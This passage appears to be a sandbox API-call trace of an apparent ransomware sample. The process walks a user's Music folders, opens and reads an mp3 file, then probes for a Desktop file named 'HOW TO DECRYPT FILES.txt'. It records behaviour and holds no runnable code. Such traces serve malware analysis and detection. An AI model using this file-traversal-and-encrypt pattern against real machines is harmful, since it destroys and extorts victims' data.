lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J", lpFilePart=0x0) returned 0x3a [0040.968] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\", lpFilePart=0x0) returned 0x3b [0040.969] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6feb3980, ftCreationTime.dwHighDateTime=0x1d4d4db, ftLastAccessTime.dwLowDateTime=0xb43a19a0, ftLastAccessTime.dwHighDateTime=0x1d4cc55, ftLastWriteTime.dwLowDateTime=0xb43a19a0, ftLastWriteTime.dwHighDateTime=0x1d4cc55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.969] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6feb3980, ftCreationTime.dwHighDateTime=0x1d4d4db, ftLastAccessTime.dwLowDateTime=0xb43a19a0, ftLastAccessTime.dwHighDateTime=0x1d4cc55, ftLastWriteTime.dwLowDateTime=0xb43a19a0, ftLastWriteTime.dwHighDateTime=0x1d4cc55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.970] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8898e70, ftCreationTime.dwHighDateTime=0x1d4d22c, ftLastAccessTime.dwLowDateTime=0x9f56570, ftLastAccessTime.dwHighDateTime=0x1d4c7f1, ftLastWriteTime.dwLowDateTime=0x9f56570, ftLastWriteTime.dwHighDateTime=0x1d4c7f1, nFileSizeHigh=0x0, nFileSizeLow=0x15b49, dwReserved0=0x0, dwReserved1=0x0, cFileName="1Su4iXpweHYtL.wav", cAlternateFileName="1SU4IX~1.WAV")) returned 1 [0040.970] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x484e68a0, ftCreationTime.dwHighDateTime=0x1d4cab0, ftLastAccessTime.dwLowDateTime=0x4a71ad30, ftLastAccessTime.dwHighDateTime=0x1d4c6d3, ftLastWriteTime.dwLowDateTime=0x4a71ad30, ftLastWriteTime.dwHighDateTime=0x1d4c6d3, nFileSizeHigh=0x0, nFileSizeLow=0x1840c, dwReserved0=0x0, dwReserved1=0x0, cFileName="8l_YwOxx30 GscxC.m4a", cAlternateFileName="8L_YWO~1.M4A")) returned 1 [0040.970] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x205096c0, ftCreationTime.dwHighDateTime=0x1d4ca6f, ftLastAccessTime.dwLowDateTime=0x56ced950, ftLastAccessTime.dwHighDateTime=0x1d4c7bd, ftLastWriteTime.dwLowDateTime=0x56ced950, ftLastWriteTime.dwHighDateTime=0x1d4c7bd, nFileSizeHigh=0x0, nFileSizeLow=0x16807, dwReserved0=0x0, dwReserved1=0x0, cFileName="E7STSf.wav", cAlternateFileName="")) returned 1 [0040.970] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51fe1160, ftCreationTime.dwHighDateTime=0x1d4cf52, ftLastAccessTime.dwLowDateTime=0x49b04b00, ftLastAccessTime.dwHighDateTime=0x1d4cec0, ftLastWriteTime.dwLowDateTime=0x49b04b00, ftLastWriteTime.dwHighDateTime=0x1d4cec0, nFileSizeHigh=0x0, nFileSizeLow=0xc3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fwotd0aTbqA_93MHOFK.m4a", cAlternateFileName="FWOTD0~1.M4A")) returned 1 [0040.970] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bf41c60, ftCreationTime.dwHighDateTime=0x1d4d5a4, ftLastAccessTime.dwLowDateTime=0x42586390, ftLastAccessTime.dwHighDateTime=0x1d4c5ad, ftLastWriteTime.dwLowDateTime=0x42586390, ftLastWriteTime.dwHighDateTime=0x1d4c5ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJp0lu4gODIB29wA_g4", cAlternateFileName="WJP0LU~1")) returned 1 [0040.970] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bf41c60, ftCreationTime.dwHighDateTime=0x1d4d5a4, ftLastAccessTime.dwLowDateTime=0x42586390, ftLastAccessTime.dwHighDateTime=0x1d4c5ad, ftLastWriteTime.dwLowDateTime=0x42586390, ftLastWriteTime.dwHighDateTime=0x1d4c5ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJp0lu4gODIB29wA_g4", cAlternateFileName="WJP0LU~1")) returned 0 [0040.971] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0040.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0040.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.971] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J", lpFilePart=0x0) returned 0x3a [0040.971] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\", lpFilePart=0x0) returned 0x3b [0040.971] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6feb3980, ftCreationTime.dwHighDateTime=0x1d4d4db, ftLastAccessTime.dwLowDateTime=0xb43a19a0, ftLastAccessTime.dwHighDateTime=0x1d4cc55, ftLastWriteTime.dwLowDateTime=0xb43a19a0, ftLastWriteTime.dwHighDateTime=0x1d4cc55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.971] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6feb3980, ftCreationTime.dwHighDateTime=0x1d4d4db, ftLastAccessTime.dwLowDateTime=0xb43a19a0, ftLastAccessTime.dwHighDateTime=0x1d4cc55, ftLastWriteTime.dwLowDateTime=0xb43a19a0, ftLastWriteTime.dwHighDateTime=0x1d4cc55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.971] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8898e70, ftCreationTime.dwHighDateTime=0x1d4d22c, ftLastAccessTime.dwLowDateTime=0x9f56570, ftLastAccessTime.dwHighDateTime=0x1d4c7f1, ftLastWriteTime.dwLowDateTime=0x9f56570, ftLastWriteTime.dwHighDateTime=0x1d4c7f1, nFileSizeHigh=0x0, nFileSizeLow=0x15b49, dwReserved0=0x0, dwReserved1=0x0, cFileName="1Su4iXpweHYtL.wav", cAlternateFileName="1SU4IX~1.WAV")) returned 1 [0040.971] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x484e68a0, ftCreationTime.dwHighDateTime=0x1d4cab0, ftLastAccessTime.dwLowDateTime=0x4a71ad30, ftLastAccessTime.dwHighDateTime=0x1d4c6d3, ftLastWriteTime.dwLowDateTime=0x4a71ad30, ftLastWriteTime.dwHighDateTime=0x1d4c6d3, nFileSizeHigh=0x0, nFileSizeLow=0x1840c, dwReserved0=0x0, dwReserved1=0x0, cFileName="8l_YwOxx30 GscxC.m4a", cAlternateFileName="8L_YWO~1.M4A")) returned 1 [0040.971] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x205096c0, ftCreationTime.dwHighDateTime=0x1d4ca6f, ftLastAccessTime.dwLowDateTime=0x56ced950, ftLastAccessTime.dwHighDateTime=0x1d4c7bd, ftLastWriteTime.dwLowDateTime=0x56ced950, ftLastWriteTime.dwHighDateTime=0x1d4c7bd, nFileSizeHigh=0x0, nFileSizeLow=0x16807, dwReserved0=0x0, dwReserved1=0x0, cFileName="E7STSf.wav", cAlternateFileName="")) returned 1 [0040.972] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51fe1160, ftCreationTime.dwHighDateTime=0x1d4cf52, ftLastAccessTime.dwLowDateTime=0x49b04b00, ftLastAccessTime.dwHighDateTime=0x1d4cec0, ftLastWriteTime.dwLowDateTime=0x49b04b00, ftLastWriteTime.dwHighDateTime=0x1d4cec0, nFileSizeHigh=0x0, nFileSizeLow=0xc3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fwotd0aTbqA_93MHOFK.m4a", cAlternateFileName="FWOTD0~1.M4A")) returned 1 [0040.972] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bf41c60, ftCreationTime.dwHighDateTime=0x1d4d5a4, ftLastAccessTime.dwLowDateTime=0x42586390, ftLastAccessTime.dwHighDateTime=0x1d4c5ad, ftLastWriteTime.dwLowDateTime=0x42586390, ftLastWriteTime.dwHighDateTime=0x1d4c5ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJp0lu4gODIB29wA_g4", cAlternateFileName="WJP0LU~1")) returned 1 [0040.972] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.972] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0040.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0040.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0040.972] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\WJp0lu4gODIB29wA_g4", nBufferLength=0x105, lpBuffer=0x3adf50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\WJp0lu4gODIB29wA_g4", lpFilePart=0x0) returned 0x4e [0040.972] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\WJp0lu4gODIB29wA_g4\\", nBufferLength=0x105, lpBuffer=0x3adf24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\WJp0lu4gODIB29wA_g4\\", lpFilePart=0x0) returned 0x4f [0040.972] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\WJp0lu4gODIB29wA_g4\\*", lpFindFileData=0x3ae170 | out: lpFindFileData=0x3ae170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bf41c60, ftCreationTime.dwHighDateTime=0x1d4d5a4, ftLastAccessTime.dwLowDateTime=0x42586390, ftLastAccessTime.dwHighDateTime=0x1d4c5ad, ftLastWriteTime.dwLowDateTime=0x42586390, ftLastWriteTime.dwHighDateTime=0x1d4c5ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.973] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae180 | out: lpFindFileData=0x3ae180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bf41c60, ftCreationTime.dwHighDateTime=0x1d4d5a4, ftLastAccessTime.dwLowDateTime=0x42586390, ftLastAccessTime.dwHighDateTime=0x1d4c5ad, ftLastWriteTime.dwLowDateTime=0x42586390, ftLastWriteTime.dwHighDateTime=0x1d4c5ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.973] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae180 | out: lpFindFileData=0x3ae180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bf41c60, ftCreationTime.dwHighDateTime=0x1d4d5a4, ftLastAccessTime.dwLowDateTime=0x42586390, ftLastAccessTime.dwHighDateTime=0x1d4c5ad, ftLastWriteTime.dwLowDateTime=0x42586390, ftLastWriteTime.dwHighDateTime=0x1d4c5ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0040.973] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae408) returned 1 [0040.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae414) returned 1 [0040.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0040.973] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\WJp0lu4gODIB29wA_g4", nBufferLength=0x105, lpBuffer=0x3adf50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\WJp0lu4gODIB29wA_g4", lpFilePart=0x0) returned 0x4e [0040.973] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\WJp0lu4gODIB29wA_g4\\", nBufferLength=0x105, lpBuffer=0x3adf24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\WJp0lu4gODIB29wA_g4\\", lpFilePart=0x0) returned 0x4f [0040.973] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J\\WJp0lu4gODIB29wA_g4\\*", lpFindFileData=0x3ae170 | out: lpFindFileData=0x3ae170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bf41c60, ftCreationTime.dwHighDateTime=0x1d4d5a4, ftLastAccessTime.dwLowDateTime=0x42586390, ftLastAccessTime.dwHighDateTime=0x1d4c5ad, ftLastWriteTime.dwLowDateTime=0x42586390, ftLastWriteTime.dwHighDateTime=0x1d4c5ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.973] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae180 | out: lpFindFileData=0x3ae180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bf41c60, ftCreationTime.dwHighDateTime=0x1d4d5a4, ftLastAccessTime.dwLowDateTime=0x42586390, ftLastAccessTime.dwHighDateTime=0x1d4c5ad, ftLastWriteTime.dwLowDateTime=0x42586390, ftLastWriteTime.dwHighDateTime=0x1d4c5ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.974] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae180 | out: lpFindFileData=0x3ae180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bf41c60, ftCreationTime.dwHighDateTime=0x1d4d5a4, ftLastAccessTime.dwLowDateTime=0x42586390, ftLastAccessTime.dwHighDateTime=0x1d4c5ad, ftLastWriteTime.dwLowDateTime=0x42586390, ftLastWriteTime.dwHighDateTime=0x1d4c5ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0040.974] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae408) returned 1 [0040.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae414) returned 1 [0040.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.974] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv", lpFilePart=0x0) returned 0x35 [0040.974] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\", lpFilePart=0x0) returned 0x36 [0040.974] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97352ed0, ftCreationTime.dwHighDateTime=0x1d4cbd3, ftLastAccessTime.dwLowDateTime=0xaca0bc30, ftLastAccessTime.dwHighDateTime=0x1d4d434, ftLastWriteTime.dwLowDateTime=0xaca0bc30, ftLastWriteTime.dwHighDateTime=0x1d4d434, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.974] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97352ed0, ftCreationTime.dwHighDateTime=0x1d4cbd3, ftLastAccessTime.dwLowDateTime=0xaca0bc30, ftLastAccessTime.dwHighDateTime=0x1d4d434, ftLastWriteTime.dwLowDateTime=0xaca0bc30, ftLastWriteTime.dwHighDateTime=0x1d4d434, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.974] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf831290, ftCreationTime.dwHighDateTime=0x1d4d311, ftLastAccessTime.dwLowDateTime=0x39a32300, ftLastAccessTime.dwHighDateTime=0x1d4cf46, ftLastWriteTime.dwLowDateTime=0x39a32300, ftLastWriteTime.dwHighDateTime=0x1d4cf46, nFileSizeHigh=0x0, nFileSizeLow=0x105de, dwReserved0=0x0, dwReserved1=0x0, cFileName="PkOkNYdIK1Akl.mp3", cAlternateFileName="PKOKNY~1.MP3")) returned 1 [0040.974] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.975] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0040.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0040.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.975] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv", lpFilePart=0x0) returned 0x35 [0040.975] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\", lpFilePart=0x0) returned 0x36 [0040.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97352ed0, ftCreationTime.dwHighDateTime=0x1d4cbd3, ftLastAccessTime.dwLowDateTime=0xaca0bc30, ftLastAccessTime.dwHighDateTime=0x1d4d434, ftLastWriteTime.dwLowDateTime=0xaca0bc30, ftLastWriteTime.dwHighDateTime=0x1d4d434, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.975] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97352ed0, ftCreationTime.dwHighDateTime=0x1d4cbd3, ftLastAccessTime.dwLowDateTime=0xaca0bc30, ftLastAccessTime.dwHighDateTime=0x1d4d434, ftLastWriteTime.dwLowDateTime=0xaca0bc30, ftLastWriteTime.dwHighDateTime=0x1d4d434, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.975] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf831290, ftCreationTime.dwHighDateTime=0x1d4d311, ftLastAccessTime.dwLowDateTime=0x39a32300, ftLastAccessTime.dwHighDateTime=0x1d4cf46, ftLastWriteTime.dwLowDateTime=0x39a32300, ftLastWriteTime.dwHighDateTime=0x1d4cf46, nFileSizeHigh=0x0, nFileSizeLow=0x105de, dwReserved0=0x0, dwReserved1=0x0, cFileName="PkOkNYdIK1Akl.mp3", cAlternateFileName="PKOKNY~1.MP3")) returned 1 [0040.975] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf831290, ftCreationTime.dwHighDateTime=0x1d4d311, ftLastAccessTime.dwLowDateTime=0x39a32300, ftLastAccessTime.dwHighDateTime=0x1d4cf46, ftLastWriteTime.dwLowDateTime=0x39a32300, ftLastWriteTime.dwHighDateTime=0x1d4cf46, nFileSizeHigh=0x0, nFileSizeLow=0x105de, dwReserved0=0x0, dwReserved1=0x0, cFileName="PkOkNYdIK1Akl.mp3", cAlternateFileName="PKOKNY~1.MP3")) returned 0 [0040.975] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0040.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0040.976] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3", lpFilePart=0x0) returned 0x47 [0040.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0040.976] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbbg9d\\pkold\\yghv\\pkoknydik1akl.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.976] GetFileType (hFile=0x26c) returned 0x1 [0040.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0040.976] GetFileType (hFile=0x26c) returned 0x1 [0040.976] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0x105de [0040.976] ReadFile (in: hFile=0x26c, lpBuffer=0x255ddbc, nNumberOfBytesToRead=0x105de, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x255ddbc*, lpNumberOfBytesRead=0x3ae414*=0x105de, lpOverlapped=0x0) returned 1 [0040.997] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0040.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0040.997] GetFullPathNameW 